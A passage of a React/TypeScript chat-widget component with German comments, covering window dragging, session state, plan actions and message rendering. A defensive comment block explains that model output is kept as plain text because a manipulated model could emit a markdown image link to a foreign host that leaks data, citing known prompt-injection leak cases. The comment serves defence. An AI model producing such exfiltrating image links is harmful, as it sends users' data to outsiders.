  const [ziehbar, setZiehbar] = useState(() => window.innerWidth >= ZIEH_AB);
  // Die gemerkte Lage kommt aus dem Speicher, nicht aus dem Modul: sie soll
  // den Neuaufbau des Bausteins UND das Neuladen der Seite ueberdauern, und
  // der Speicher kann beides. Der Verlauf daneben liegt aus dem umgekehrten
  // Grund im Modul (s. „Sitzungen") — er soll das Neuladen gerade NICHT
  // ueberdauern.
  const [lage, setLage] = useState<FensterLage | null>(() => leseLage());
  const [greift, setGreift] = useState<ZiehArt | null>(null);
  const zieh = useRef<{ art: ZiehArt; x: number; y: number; l: FensterLage; oben: number } | null>(null);
  const gefasst = useRef(false);
  useEffect(() => {
    const onResize = () => {
      setAusweich(ausweichRechts());
      setZiehbar(window.innerWidth >= ZIEH_AB);
      // Punkt 4: bei JEDER Fensteraenderung wieder hineinklemmen. Ohne das
      // stuende ein an den rechten Rand geschobenes Fenster nach dem
      // Verkleinern des Browsers ausserhalb — und mit ihm die Kopfzeile, an
      // der man es zurueckholen wuerde. Geschrieben wird das Ergebnis nicht:
      // beim naechsten Aufsetzen klemmt derselbe Weg erneut, und die vom
      // Nutzer gewaehlte Lage bleibt fuer den breiteren Schirm erhalten.
      setLage((cur) => {
        if (!cur) return cur;
        const f = rahmen(boxRef.current);
        const neu = klemme(cur, f.w, f.h);
        return gleicheLage(neu, cur) ? cur : neu;
      });
    };
    window.addEventListener("resize", onResize);
    return () => window.removeEventListener("resize", onResize);
  }, []);
  // Waehrend des Ziehens haengen Zeiger und Markierungssperre am ganzen
  // Dokument, nicht an der Zone: der Zeiger laeuft beim Ziehen ueber die
  // Karte, ueber Blasen und ueber Knoepfe, und ohne das wechselte er dort das
  // Aussehen und markierte Text (Punkt 8). Als Effekt geschrieben, damit ein
  // Abbau mitten im Ziehen — Bildschirmwechsel per Tastatur — nichts
  // zuruecklaesst.
  useEffect(() => {
    if (!greift) return;
    const st = document.body.style;
    const vorherWahl = st.userSelect;
    const vorherZeiger = st.cursor;
    st.userSelect = "none";
    st.cursor = ZONEN_ZEIGER[greift];
    return () => {
      st.userSelect = vorherWahl;
      st.cursor = vorherZeiger;
    };
  }, [greift]);
  const right = shifted ? ausweich : EDGE;
  const pos = fixed ? "fixed" : "absolute";
  const lang = useStore((s) => s.lang);
  // Verlauf, Entwurf und laufender Strom kommen aus dem Modul (s. „Sitzungen"),
  // nicht aus useState: der Baustein wird beim Bildschirmwechsel abgebaut.
  // Der offene Zustand gilt bildschirmuebergreifend, der Verlauf je Projekt.
  const sitzKey = projectId ?? "";
  const { msgs, input, busy } = useSyncExternalStore(abonnieren, () => sitzung(sitzKey));
  const open = useSyncExternalStore(abonnieren, () => offen);
  const scrollRef = useRef<HTMLDivElement>(null);
  // Punkt 4, zweiter Fall: beim Aufsetzen. Vor dem Zeichnen (Layout-Effekt),
  // sonst blitzt ein Fenster auf, das halb neben dem Bild steht — die
  // gespeicherte Lage stammt womoeglich von einem groesseren Schirm oder,
  // beim Wechsel Karte -> Dashboard, aus einem anderen Bezugsrahmen (dort
  // `fixed` am Sichtfenster, auf der Karte `absolute` an der Kartenwurzel).
  useLayoutEffect(() => {
    if (!boxRef.current) return;
    const f = rahmen(boxRef.current);
    setLage((cur) => {
      if (!cur) return cur;
      const neu = klemme(cur, f.w, f.h);
      return gleicheLage(neu, cur) ? cur : neu;
    });
  }, [open]);

  useEffect(() => {
    scrollRef.current?.scrollTo({ top: scrollRef.current.scrollHeight });
  }, [msgs, open]);
  // Der montierte Bildschirm ist der, der eine Markierung zeigen kann.
  //
  // onMap ist an jeder Einbaustelle eine frisch gebaute Pfeilfunktion, kommt
  // also bei jedem Rendern neu. Die Zuweisung an den Ref gehoert deshalb in
  // einen Effekt: im Renderkoerper lief sie auch bei Laeufen, die React wieder
  // verwirft (StrictMode, abgebrochene Uebergaenge) — ein Seiteneffekt im
  // falschen Moment. Derselbe Effekt fuehrt den Sitzungsschluessel nach, den
  // der Abbau-Abbruch weiter unten braucht.
  const onMapRef = useRef(onMap);
  const laufKeyRef = useRef(sitzKey);
  useEffect(() => {
    onMapRef.current = onMap;
    laufKeyRef.current = sitzKey;
  });
  useEffect(() => {
    const eintrag = { projekt: sitzKey, ruf: (sel: ChatMapSelection) => onMapRef.current?.(sel) };
    kartenRuf = eintrag;
    return () => {
      // Nur abmelden, wenn noch DIESER Eintrag steht: beim Wechsel zwischen
      // zwei Bildschirmen kann React den neuen montieren, BEVOR er den alten
      // abbaut — ein bedingungsloses null wuerde den frisch eingetragenen
      // wieder loeschen. Dafuer reicht die Identitaet des Eintrags; die frueher
      // mitgefuehrte laufende Nummer war zusaetzlich die Antwort auf „lebt der
      // Lauf laenger als sein Baustein?" — die stellt sich mit dem Abbruch beim
      // Abbau nicht mehr, und die Nummer ist deshalb weg.
      if (kartenRuf === eintrag) kartenRuf = null;
    };
  }, [sitzKey]);
  // E4 — der Abbruch beim Abbau ist zurueck; die Abwaegung steht im Kopf der
  // Datei. Nur der Lauf DIESES Bausteins stirbt: ein Projektwechsel baut nichts
  // ab, dessen Lauf laeuft in seinem eigenen Projekt weiter.
  //
  // Eine Bedingung, die heute gilt und beim Erweitern gelten muss: kein
  // Aufrufer reicht schon BEIM Montieren eine Frage herein — `ask` wird
  // ueberall erst durch eine Nutzereingabe gesetzt (KarteScreen.tsx:2492,
  // ProjectStats.tsx:3217). Nur deshalb ist die Reihenfolge harmlos, in der
  // React beim Bildschirmwechsel den neuen Baustein montieren kann, bevor er
  // den alten abbaut: im selben Durchlauf hat der neue noch nichts gestartet,
  // was dieser Abbruch treffen koennte. Wer je eine Frage automatisch beim
  // Montieren stellt, muss den Lauf hier an seinen Urheber binden.
  useEffect(
    () => () => {
      // ALLE laufenden Antworten abbrechen, nicht nur die der zuletzt
      // gerenderten Sitzung. Der Baustein ueberlebt einen Projektwechsel
      // (KarteScreen bleibt montiert, /project/:id traegt kein key) — ein in
      // Projekt A gestarteter Lauf hinge sonst an einem laufKey, den dieser
      // Abbruch nicht mehr trifft, und schriebe nach dem Verlassen des
      // Bildschirms unbeaufsichtigt weiter. Genau diese Luecke hat die
      // Abnahme gefunden (E4 nur halb erfuellt). Fuer die anderen Sitzungen
      // ist abort() ein No-op: ihr ac ist null.
      for (const s of sitzungen.values()) s.ac?.abort();
    },
    [],
  );
  // aus der Kartensuche gereichte Frage: Panel auf, Frage raus. Token (t)
  // statt Wertvergleich, damit dieselbe Frage zweimal gestellt werden kann.
  const lastAsk = useRef(0);
  /** Projekt, das beim EINTREFFEN der Frage eingestellt war — siehe unten. */
  const askProjekt = useRef<string | null>(null);
  useEffect(() => {
    if (!ask || ask.t === lastAsk.current) return;
    // Die Frage gehoert zu dem Projekt, das der Nutzer beim Tippen vor sich
    // hatte. Der Effekt kann sie aber erst NACHHOLEN, wenn busy faellt oder
    // projectId eintrifft — und bis dahin kann der Nutzer das Projekt
    // gewechselt haben. Ohne diese Bindung liefe die fuer A getippte Frage
    // dann mit B's Rolle und B's schreibenden Werkzeugen (von der Abnahme als
    // neu eingebauter Fehler belegt). Beim ersten Sehen festhalten; weicht das
    // Projekt beim Nachholen ab, wird die Frage VERWORFEN und verbraucht —
    // lieber eine verlorene Frage als eine im falschen Projekt ausgefuehrte.
    if (askProjekt.current === null) askProjekt.current = projectId || null;
    if (projectId && askProjekt.current && askProjekt.current !== projectId) {
      lastAsk.current = ask.t;
      askProjekt.current = null;
      onConsumed?.();
      return;
    }
    setzeOffen(true);
    // Verbraucht ist eine Frage erst, wenn sie WIRKLICH rausging. Bisher stand
    // das Merken VOR der Pruefung: fehlte projectId (Seite noch am Laden) oder
    // lief gerade eine Antwort, schluckte der Effekt die Frage trotzdem —
    // getippt, quittiert, nie gestellt. Jetzt bleibt sie stehen, und weil
    // projectId und busy in den Abhaengigkeiten haengen, holt der Effekt sie
    // selbst nach, sobald der Weg frei ist.
    if (ask.q && (!projectId || busy)) return;
    lastAsk.current = ask.t;
    askProjekt.current = null;
    if (ask.q && projectId) void sendeAn(sitzKey, projectId, ask.q, lang);
    // verbraucht — sonst bleibt die Frage im Zustand des Aufrufers stehen und wuerde
    // beim naechsten Montieren des Widgets ein zweites Mal rausgehen
    onConsumed?.();
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [ask, projectId, sitzKey, busy]);

  // KI-Add-on (Beschluss 22.08.): gebucht → sichtbar fuer JEDES Projektmitglied
  // (schreibende Werkzeuge filtert das Backend nach Rolle); ohne Buchung bleibt
  // der Chat admin-only wie zuvor.
  const projQ = useQuery({ queryKey: ["project", projectId], queryFn: () => api.projects.get(projectId!), enabled: !!projectId });
  const hasKi = (projQ.data?.addons ?? []).includes("ki");
  if (!(isAdmin || (hasKi && projQ.data?.myRole))) return null;
  // Ohne Projekt gibt es keinen Chat, und zwar nicht aus Vorsicht, sondern weil
  // das Backend es so entscheidet: der ProjectAccessGuard loest die Projekt-ID
  // aus dem RUMPF auf (chat.controller.ts, @RequireAddon/@RequireProjectRole mit
  // kind:'body') und wirft ohne sie NotFound. Ein Knopf ohne Projekt waere also
  // ein Knopf, der garantiert mit 404 endet — der wird gar nicht erst angeboten.
  // Nachgesehen 28.08.: hier geht nichts verloren. Weder diese Schranke noch
  // die Rolle darueber noch `hidden` bauen etwas ab — und der Verlauf laege
  // ohnehin im Modul.
  if (!projectId) return null;
  if (hidden) return null;

  async function applyPlan(planId: string) {
    patchPlan(sitzKey, planId, (m) => ({ ...m, planState: "applying" }));
    try {
      const r = await fetch(`/api/chat/plan/${planId}/apply`, { method: "POST", credentials: "include" });
      const data = (await r.json()) as { results?: { ok: boolean; refused?: boolean; warnings?: string[]; steps?: Array<{ step: string; ok: boolean }> } };
      const ok = !!data.results?.ok;
      patchPlan(sitzKey, planId, (m) => ({ ...m, planState: ok ? "applied" : "failed", planResult: data.results }));
    } catch {
      patchPlan(sitzKey, planId, (m) => ({ ...m, planState: "failed" }));
    }
  }
  async function discardPlan(planId: string) {
    try {
      await fetch(`/api/chat/plan/${planId}`, { method: "DELETE", credentials: "include" });
    } catch {
      /* ignore */
    }
    patchPlan(sitzKey, planId, (m) => ({ ...m, planState: "discarded" }));
  }
  async function downloadPlan(planId: string) {
    try {
      const r = await fetch(`/api/chat/plan/${planId}`, { credentials: "include" });
      const blob = new Blob([JSON.stringify(await r.json(), null, 2)], { type: "application/json" });
      const url = URL.createObjectURL(blob);
      const a = document.createElement("a");
      a.href = url;
      a.download = `plan-${planId.slice(0, 8)}.json`;
      a.click();
      URL.revokeObjectURL(url);
    } catch {
      /* ignore */
    }
  }

  function send() {
    const text = input.trim();
    if (!text || !projectId) return;
    // Erst pruefen, dann leeren. Umgekehrt verschluckte ein Enter waehrend
    // einer laufenden Antwort den Text spurlos: der Entwurf war geloescht,
    // bevor sendeAn() den Lauf wegen busy stumm abwies. Kein Hinweis noetig —
    // der Entwurf bleibt einfach stehen und geht mit dem naechsten Enter raus.
    if (sitzung(sitzKey).busy) return;
    setzeSitzung(sitzKey, (st) => ({ ...st, input: "" }));
    void sendeAn(sitzKey, projectId, text, lang);
  }

  // ============================================================
  // Ziehen und Groessenaendern — Zeigermuster wie GfiPanel.tsx:382
  // (onPointerDown + setPointerCapture, touchAction "none"). Die Fassung
  // dort haelt den Anfangswert in einem Ref und rechnet im Bewegen die
  // Verschiebung darauf; genau das steht hier, nur mit vier Zahlen statt
  // einer.
  // ============================================================
  function beginneZiehen(art: ZiehArt, e: React.PointerEvent<HTMLElement>): void {
    if (!ziehbar || e.button !== 0) return;
    // Die Knoepfe im Kopf bleiben Knoepfe. Ohne das faenge der Griff den
    // Zeigerdruck ab und „Neu starten"/„Schliessen" waeren nur noch
    // Ziehflaechen.
    if (art === "move" && (e.target as HTMLElement).closest("button")) return;
    const el = boxRef.current;
    if (!el) return;
    const f = rahmen(el);
    // Die Ist-Lage wird GEMESSEN, nicht aus den Vorgaben gerechnet: maxWidth,
    // maxHeight, --safe-bottom und das Ausweichen haben alle schon
    // zugeschlagen, und nur die Messung kennt ihr Ergebnis. Der aufgeloeste
    // Wert von `bottom` traegt --safe-bottom bereits in sich — die eigene
    // Lage rechnet es deshalb nicht ein zweites Mal dazu.
    //
    // Gemessen wird am LAYOUT (getComputedStyle, offsetWidth) statt an
    // getBoundingClientRect: der Auftritt .anim-pop skaliert das Fenster
    // 0,22 s lang von 0,96 auf 1 (base.css, popIn). Ein in dieser Zeit
    // genommenes Rechteck ist rund 15 px zu schmal und um die halbe Differenz
    // verschoben — das Fenster zuckte beim Anfassen. Beide Masse hier kennen
    // die Verzerrung nicht.
    const cs = getComputedStyle(el);
    const l: FensterLage = { r: parseFloat(cs.right) || 0, b: parseFloat(cs.bottom) || 0, w: el.offsetWidth, h: el.offsetHeight };
    zieh.current = { art, x: e.clientX, y: e.clientY, l, oben: f.h - l.b - l.h };
    gefasst.current = false;
    e.currentTarget.setPointerCapture(e.pointerId);
    // Kein Markieren, kein Kartenschwenk: die Karte liegt zwar als
    // Geschwister daneben und bekaeme das Ereignis ohnehin nicht, aber der
    // Browser wuerde ohne preventDefault Text auswaehlen (Punkt 8).
    e.preventDefault();
    e.stopPropagation();
    setGreift(art);
  }
  function bewegeZiehen(e: React.PointerEvent<HTMLElement>): void {
    const z = zieh.current;
    if (!z) return;
    const dx = e.clientX - z.x;
    const dy = e.clientY - z.y;
    // Klick-Schlupf: erst ab 3 px gilt das Fenster als SELBST bewegt. Ohne
    // das nagelte schon ein Klick auf die Kopfzeile die Lage fest — und
    // damit stillschweigend das Ausweichen ab (Punkt 5).
    if (!gefasst.current && Math.abs(dx) + Math.abs(dy) < 3) return;
    gefasst.current = true;
    const f = rahmen(boxRef.current);
    const n: FensterLage = { ...z.l };
    if (z.art === "move") {
      n.r = z.l.r - dx;
      n.b = z.l.b - dy;
    } else {
      // An einer Kante ziehen heisst: die GEGENUEBERLIEGENDE bleibt stehen.
      // Links und oben ist das der Anker selbst (r bzw. b bleiben), also
      // waechst dort nur das Mass — begrenzt so, dass die wandernde Kante im
      // Rahmen bleibt. Unten ist der Anker die wandernde Kante; damit die
      // Oberkante trotzdem stehen bleibt, wird b aus der gemerkten Oberkante
      // zurueckgerechnet statt einfach mitgeschoben.
      if (z.art === "w" || z.art === "nw") n.w = spanne(z.l.w - dx, MIN_W, f.w - z.l.r);
      if (z.art === "n" || z.art === "nw") n.h = spanne(z.l.h - dy, MIN_H, f.h - z.l.b);
      if (z.art === "s") {
        n.h = spanne(z.l.h + dy, MIN_H, f.h - z.oben);
        n.b = Math.max(0, f.h - z.oben - n.h);
      }
    }
    setLage(klemme(n, f.w, f.h));
  }
  function endeZiehen(): void {
    if (!zieh.current) return;
    zieh.current = null;
    setGreift(null);
    // Erst hier schreiben, nicht bei jeder Zeigerbewegung: waehrend eines
    // Zugs faellt ein Bild je Bewegung an, und localStorage schreibt
    // synchron. Die Zeigerfassung endet mit pointerup von selbst.
    if (gefasst.current && lage) save(LAGE_KEY, lage);
    gefasst.current = false;
  }

  if (!open && !launcher) return null;
  if (!open)
    return (
      <button
        className="glass-strong anim-pop ring-focus mobile-hide"
        onClick={() => setzeOffen(true)}
        title={lang === "de" ? "KI-Assistent" : "AI assistant"}
        style={{
          position: pos,
          right,
          bottom: `calc(${launcherBottom}px + var(--safe-bottom))`,
          zIndex: 26,
          transition: "right .32s cubic-bezier(.22,1,.36,1)",
          width: 46,
          height: 46,
          borderRadius: 23,
          border: "1px solid var(--glass-border)",
          display: "flex",
          alignItems: "center",
          justifyContent: "center",
          cursor: "pointer",
          color: "var(--accent-text)",
          boxShadow: "var(--shadow-lg)",
        }}
      >
        <Icon name="sparkle" weight="fill" size={20} />
      </button>
    );

  // Die eigene Lage gilt nur oberhalb der Telefonschwelle — darunter bleibt
  // das heutige Verhalten unangetastet (Punkt 6), auch wenn auf einem breiten
  // Schirm schon einmal eine Lage gesetzt wurde.
  const eigen = ziehbar ? lage : null;
  return (
    <div
      ref={boxRef}
      // Der Uebergang des Ausweichens steht als KLASSE in base.css, nicht
      // inline: nur so erreicht ihn die Regel fuer abbestellte Bewegung
      // (prefers-reduced-motion, base.css) — ein Inline-Stil schluege jede
      // Klasse. Wer das Fenster selbst hingestellt hat, braucht ihn nicht: es
      // weicht dann nicht mehr aus, und waehrend des Ziehens liefe der
      // Uebergang der Hand hinterher.
      className={`frost anim-pop${eigen ? "" : " chat-ausweich"}`}
      style={{
        position: pos,
        right: eigen ? eigen.r : right,
        bottom: eigen ? eigen.b : `calc(${EDGE}px + var(--safe-bottom))`,
        width: eigen ? eigen.w : CHAT_W,
        // Die Deckel gelten nur fuer die Vorgabelage; die eigene ist von
        // klemme() schon in den Rahmen gerechnet, und ein zweiter Deckel
        // schnitte beim Groessenaendern still mit.
        maxWidth: eigen ? undefined : "calc(100vw - 32px)",
        height: eigen ? eigen.h : CHAT_H,
        maxHeight: eigen ? undefined : "calc(100% - 32px)",
        borderRadius: 18,
        zIndex: 35,
        display: "flex",
        flexDirection: "column",
        boxShadow: "var(--shadow-lg)",
        overflow: "hidden",
      }}
    >
      {/* Der Griff ist die vorhandene Kopfzeile — kein zusaetzliches Symbol,
          kein Rahmen, keine Beschriftung; nur der Mauszeiger verraet ihn. */}
      <div
        onPointerDown={(e) => beginneZiehen("move", e)}
        onPointerMove={bewegeZiehen}
        onPointerUp={endeZiehen}
        onPointerCancel={endeZiehen}
        style={{
          padding: "13px 16px 11px",
          borderBottom: "1px solid var(--glass-border)",
          display: "flex",
          alignItems: "center",
          gap: 9,
          cursor: ziehbar ? (greift === "move" ? "grabbing" : "grab") : undefined,
          // touchAction "none" nur dort, wo wirklich gezogen wird: sonst naehme
          // die Kopfzeile auf dem Telefon dem Browser das Wischen ab, ohne
          // etwas dafuer zu geben.
          touchAction: ziehbar ? "none" : undefined,
          userSelect: ziehbar ? "none" : undefined,
        }}
      >
        <Icon name="sparkle" weight="fill" size={17} style={{ color: "var(--accent-text)" }} />
        <span style={{ fontSize: 13.5, fontWeight: 700 }}>{lang === "de" ? "KI-Assistent" : "AI assistant"}</span>
        {/* Auf Seiten ohne eigenes Projekt (Uebersicht, Admin) arbeitet der Chat
            trotzdem in EINEM Projekt — welches das ist, darf nicht geraten werden
            muessen. Deshalb steht der Name hier, klein und ohne eigene Formsprache. */}
        {contextLabel && (
          <span
            title={lang === "de" ? `Bezugsprojekt: ${contextLabel}` : `Project context: ${contextLabel}`}
            style={{ fontSize: 10.5, fontWeight: 600, color: "var(--text-mute)", background: "var(--field)", border: "1px solid var(--field-border)", borderRadius: 6, padding: "2px 7px", maxWidth: 140, minWidth: 0, flexShrink: 1, overflow: "hidden", textOverflow: "ellipsis", whiteSpace: "nowrap" }}
          >
            {contextLabel}
          </span>
        )}
        <span style={{ marginRight: "auto" }} />
        {msgs.length > 0 && <IconBtn icon="arrow-counter-clockwise" size={14} box={28} title={lang === "de" ? "Neu starten" : "Reset"} onClick={() => {
              sitzung(sitzKey).ac?.abort();
              setzeSitzung(sitzKey, (st) => ({ ...st, msgs: [], busy: false, ac: null }));
            }} />}
        <IconBtn icon="x" size={15} box={28} title={lang === "de" ? "Schließen" : "Close"} onClick={() => setzeOffen(false)} />
      </div>

      <div ref={scrollRef} className="scroll" style={{ flex: 1, overflowY: "auto", padding: "14px 14px 6px", display: "flex", flexDirection: "column", gap: 10 }}>
        {msgs.length === 0 && (
          <div style={{ margin: "auto", textAlign: "center", color: "var(--text-mute)", fontSize: 12.5, lineHeight: 1.6, padding: "0 18px" }}>
            <Icon name="sparkle" size={26} style={{ color: "var(--accent-text)", marginBottom: 8 }} />
            <br />
            {lang === "de"
              ? "Fragen zu Projekten, Layern & Daten — oder Änderungen direkt ausführen lassen. Läuft auf EU-Servern (Hetzner), Rückfall auf das lokale Modell."
              : "Ask about projects, layers & data — or have changes executed live. Runs on EU servers (Hetzner), local model as fallback."}
          </div>
        )}
        {msgs.map((m, i) => (
          <div key={i} style={{ display: "flex", flexDirection: "column", gap: 4, alignItems: m.role === "user" ? "flex-end" : "flex-start" }}>
            {m.rueckfall && (
              /* Bewusst gedaempft und ohne Warnfarbe: es ist kein Fehler,
                 sondern eine Auskunft ueber die Wartezeit. Ein rotes Zeichen
                 haette die Antwort entwertet, die gleich darunter erscheint. */
              <span
                title={lang === "de" ? "Der schnelle Dienst antwortet gerade nicht. Die Antwort kommt über den Ausweichweg." : "The fast service is not responding. The answer is coming via the fallback."}
                style={{ fontSize: 10.5, fontWeight: 600, color: "var(--text-mute)", background: "var(--field)", border: "1px solid var(--field-border)", borderRadius: 7, padding: "2px 8px", display: "inline-flex", alignItems: "center", gap: 5 }}
              >
                {busy && i === msgs.length - 1 ? <Spinner size={10} /> : <Icon name="arrows-clockwise" size={10} />}
                {lang === "de" ? "Ausweichweg — dauert länger" : "Fallback — takes longer"}
              </span>
            )}
            {(m.tools ?? []).map((t, j) => (
              <span key={j} style={{ fontSize: 10.5, fontWeight: 600, color: "var(--accent-text)", background: "var(--accent-soft)", borderRadius: 7, padding: "2px 8px", display: "inline-flex", alignItems: "center", gap: 4 }}>
                <Icon name="lightning" size={10} /> {TOOL_LABELS[t] ?? t}
              </span>
            ))}
            {/* Die Warteblase MUSS in dieser Bedingung stehen: die frisch angelegte
                Assistentennachricht hat content "" und fiel damit durch beide Zweige —
                zwischen Absenden und erstem Zeichen war schlicht nichts zu sehen, der
                Ladezustand darunter war unerreichbar. */}
            {(m.content || m.role === "user" || (busy && i === msgs.length - 1)) && (
              <div
                className={m.role === "user" ? "chat-bubble-user" : undefined}
                style={{
                  maxWidth: "88%",
                  fontSize: 13,
                  lineHeight: 1.55,
                  whiteSpace: "pre-wrap",
                  wordBreak: "break-word",
                  borderRadius: m.role === "user" ? "13px 13px 4px 13px" : "13px 13px 13px 4px",
                  padding: "8px 12px",
                  background: m.role === "user" ? "var(--accent)" : "var(--field)",
                  color: m.role === "user" ? "#fff" : "var(--text)",
                  border: m.role === "user" ? "none" : "1px solid var(--field-border)",
                }}
              >
                {/* KLARTEXT — SICHERHEITSEIGENSCHAFT, KEIN DARSTELLUNGSMANGEL (H6a).
                    Die Antwort des Modells steht hier als React-TEXTKIND. React
                    maskiert sie, `whiteSpace: pre-wrap` haelt bloss die Umbrueche.
                    Es gibt in dieser Datei kein dangerouslySetInnerHTML und in
                    frontend/package.json keinen Markdown-Renderer (marked, remark,
                    markdown-it) und kein DOMPurify — bewusst nicht.

                    WARUM DAS SO BLEIBEN MUSS: der Chat kann von aussen bedient
                    werden (oeffentliche Demo), und der Angreifer ist zugleich der
                    EMPFAENGER der Antwort. Der Antwortstrom ist damit nicht kappbar.
                    Was kappbar ist, ist der Weg, auf dem eine ueberredete Antwort
                    etwas NACHLAEDT. Rendert hier jemand Markdown, wird aus dem
                    sichtbaren Text `![x](https://fremder/?d=<Daten>)` ein echter
                    Bildabruf — der Browser schickt die Daten an einen fremden
                    Server, ohne dass jemand klickt. Genau dieser Weg (EchoLeak,
                    ForcedLeak, GitLab Duo) existiert bei uns heute NICHT.

                    Es sieht wie ein Fehler aus — die Systemtexte weisen das Modell
                    an, Markdown zu benutzen, also stehen im Chat Sternchen. Das ist
                    der Fehler, nicht die Darstellung: H6b raeumt die Anweisung aus
                    dem Systemtext. Wer statt dessen den Renderer nachruestet,
                    reisst das Leck auf.

                    Falls es doch je einer sein muss (H6d): Bild- UND Linksyntax
                    abschalten, inline UND Referenzform (bei EchoLeak war genau die
                    Referenzform ungefiltert), DOMPurify ueber den ZUSAMMENGESETZTEN
                    Strom statt je Haeppchen, und bei DOMPurify.removed.length > 0
                    das Rendern ABBRECHEN statt bereinigt weiterzeichnen. DOMPurify
                    entfernt <img> von sich aus NICHT. Zweite Schicht bleibt die CSP
                    aus frontend/nginx.conf (H6c: img-src/connect-src ohne Fremde). */}
                {m.content ||
                  (busy && i === msgs.length - 1 ? (
                    // Zwischen Absenden und erstem Zeichen laeuft die Anbieterkette mit
                    // ihren Werkzeugaufrufen: ueber 2 s Wartezeit, unbekannte Endstruktur,
                    // kein bezifferbarer Fortschritt — genau der Fall, fuer den der
                    // Denkloader vorgesehen ist. Sobald der Textstrom einsetzt, uebernimmt
                    // der Text und der Loader ist weg.
                    //
                    // Die Warteflaeche ist fest (28x28 an der Huelle), und der Loader
                    // bekommt genau dieses Mass mit. Beides zusammen ist der Punkt: die
                    // Animation kann die Geometrie nicht bestimmen, also springt die
                    // Blase beim ersten Zeichen nicht.
                    <span style={{ display: "flex", alignItems: "center", width: 28, height: 28 }}>
                      <Denkloader variante="matrix" groesse={28} tempo={1} label={lang === "de" ? "Antwort wird erzeugt" : "Generating answer"} />
                    </span>
                  ) : null)}
              </div>
            )}
            {m.content && !(busy && i === msgs.length - 1) && <CopyBtn text={m.content} lang={lang} />}
            {m.map && (
              <button
                onClick={() => onMap?.(m.map!)}
                className="ring-focus"
                style={{ display: "inline-flex", alignItems: "center", gap: 6, fontSize: 11.5, fontWeight: 600, padding: "5px 10px", borderRadius: 9, border: "1px solid var(--accent-ring)", background: "var(--accent-soft)", color: "var(--accent-text)", cursor: "pointer" }}
              >
                <Icon name="crosshair-simple" size={12} />
                {m.map.title ?? (lang === "de" ? `${m.map.fids.length} Objekte` : `${m.map.fids.length} features`)} · {lang === "de" ? "auf der Karte" : "on the map"}
              </button>
            )}
            {m.plan && m.planState !== "discarded" && <PlanCardView msg={m} lang={lang} onApply={applyPlan} onDiscard={discardPlan} onDownload={downloadPlan} />}
          </div>
        ))}
      </div>

      <div style={{ padding: "10px 12px 12px", borderTop: "1px solid var(--glass-border)", display: "flex", gap: 8, alignItems: "flex-end" }}>
        <textarea
          className="inp"
          rows={1}
          value={input}
          placeholder={lang === "de" ? "Nachricht…" : "Message…"}
          onChange={(e) => setzeSitzung(sitzKey, (st) => ({ ...st, input: e.target.value }))}
          onKeyDown={(e) => {
            if (e.key === "Enter" && !e.shiftKey) {
              e.preventDefault();
              void send();
            }
          }}
          style={{ flex: 1, resize: "none", maxHeight: 110, fontFamily: "inherit", fontSize: 13 }}
        />
        {busy ? (
          <IconBtn icon="x" size={15} box={36} title="Stop" onClick={() => sitzung(sitzKey).ac?.abort()} />
        ) : (
          <IconBtn icon="paper-plane-tilt" size={16} box={36} title={lang === "de" ? "Senden" : "Send"} onClick={() => void send()} />
        )}
      </div>

      {/* Groessenzonen: unsichtbar, schmal, zuletzt im Baum — die
          Geschwister darueber sind statisch gesetzt, also malt der Browser
          diese hier ohne eigene Ordnungszahl darueber. */}
      {ziehbar &&
        (Object.keys(ZONEN) as Array<Exclude<ZiehArt, "move">>).map((art) => (
          <div
            key={art}
            onPointerDown={(e) => beginneZiehen(art, e)}
            onPointerMove={bewegeZiehen}
            onPointerUp={endeZiehen}
            onPointerCancel={endeZiehen}
            style={{ position: "absolute", touchAction: "none", ...ZONEN[art] }}
          />
        ))}
    </div>
  );
}
